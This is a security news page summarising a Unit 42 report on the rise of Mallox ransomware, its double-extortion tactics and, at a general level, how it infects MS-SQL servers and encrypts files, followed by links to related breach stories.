Security News > 2023 > July > Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks
Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal.
"Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince victims to pay the ransom fee," security researchers Lior Rochberger and Shimi Cohen said in a new report shared with The Hacker News.
Mallox is linked to a threat actor that's also linked to other ransomware strains, such as TargetCompany, Tohnichi, Fargo, and, most recently, Xollam.
Upon gaining a successful foothold on the infected host, a PowerShell command is executed to retrieve the ransomware payload from a remote server.
The binary, for its part, attempts to stop and remove SQL-related services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an open-source tool designed to counter ransomware attacks, prior to commencing its encryption process, after which a ransom note is dropped in every directory.
"The Mallox ransomware group has been more active in the past few months, and their recent recruiting efforts may enable them to attack more organizations if the recruitment drive is successful," the researchers said.
News URL
https://thehackernews.com/2023/07/mallox-ransomware-exploits-weak-ms-sql.html
Related news
- Helldown ransomware exploits Zyxel VPN flaw to breach networks (source)
- BT unit took servers offline after Black Basta ransomware breach (source)
- Ransomware hits web hosting servers via vulnerable CyberPanel instances (source)
- LA housing authority confirms breach claimed by Cactus ransomware (source)
- Meet Interlock — The new ransomware targeting FreeBSD servers (source)
- New Ymir Ransomware Exploits Memory for Stealthy Attacks; Targets Corporate Networks (source)
- Hackers exploit ProjectSend flaw to backdoor exposed servers (source)
- Bologna FC confirms data breach after RansomHub ransomware attack (source)
- Russia-Linked Turla Exploits Pakistani Hackers' Servers to Target Afghan and Indian Entities (source)
- Anna Jaques Hospital ransomware breach exposed data of 300K patients (source)